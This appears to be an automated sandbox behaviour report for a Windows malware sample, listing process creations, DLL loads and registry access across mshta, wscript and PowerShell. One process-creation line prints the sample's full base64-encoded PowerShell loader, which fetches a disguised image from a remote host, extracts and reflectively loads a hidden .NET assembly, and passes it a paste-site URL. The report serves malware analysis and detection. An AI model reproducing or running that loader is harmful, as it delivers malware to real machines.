Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithenergylevelgoodforbusiness.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD327.tmp" "c:\Users\user\AppData\Local\Temp\zl2mzrqp\CSC28505E0AE9E8489AA3B119DACC3AAED2.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cyclooctadiene = 'JGhpY2N1cHBpbmcgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcHJpbXBpbmcgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtb3ZpbmdzID0gJHByaW1waW5nLkRvd25sb2FkRGF0YSgkaGljY3VwcGluZyk7JGFuc2VyZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkbW92aW5ncyk7JGZsdXR0ZXJieSA9ICc8PEJBU0U2NF9TVEFSVD4+JzskaGFta2luID0gJzw8QkFTRTY0X0VORD4+JzskdW5ncmlldmluZyA9ICRhbnNlcmVzLkluZGV4T2YoJGZsdXR0ZXJieSk7JGNvbnRyYXZlbmVyID0gJGFuc2VyZXMuSW5kZXhPZigkaGFta2luKTskdW5ncmlldmluZyAtZ2UgMCAtYW5kICRjb250cmF2ZW5lciAtZ3QgJHVuZ3JpZXZpbmc7JHVuZ3JpZXZpbmcgKz0gJGZsdXR0ZXJieS5MZW5ndGg7JHNub3dtb2JpbGUgPSAkY29udHJhdmVuZXIgLSAkdW5ncmlldmluZzskd2hvcnRsZSA9ICRhbnNlcmVzLlN1YnN0cmluZygkdW5ncmlldmluZywgJHNub3dtb2JpbGUpOyRyZXZlYWxlZCA9IC1qb2luICgkd2hvcnRsZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkd2hvcnRsZS5MZW5ndGgpXTskbWFza2luZyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHJldmVhbGVkKTskdHJhbnNvY2VhbmljID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWFza2luZyk7JFRoYXRjaGVyaXNlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JFRoYXRjaGVyaXNlLkludm9rZSgkbnVsbCwgQCgnMC8xTDJ0ZS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnYXNwbmV0X2NvbXBpbGVyJywgJyR0aG9tc29uaWFuaXNtJywgJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJzEnLCckdGhvbXNvbmlhbmlzbScsJycpKTs=';$italicizing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($cyclooctadiene));Invoke-Expression $italicizing	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: Automation.pdb source: powershell.exe, 00000003.00000002.2227776899.000000000294E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.Managem..Automation.pdb source: powershell.exe, 00000003.00000002.2227776899.000000000294E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000007.00000002.2501733594.000000000537E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000007.00000002.2537047764.0000000006C1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2534836877.0000000006790000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000007.00000002.2501733594.000000000537E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000007.00000002.2501733594.000000000537E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000007.00000002.2501733594.000000000537E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.writermetadataoptionshvhqdnlib.dotnetimdtokenproviderhphshrdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypeilimdnlib.dotnetifullnamecreatorhelperinioihiidnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsijikiddnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablef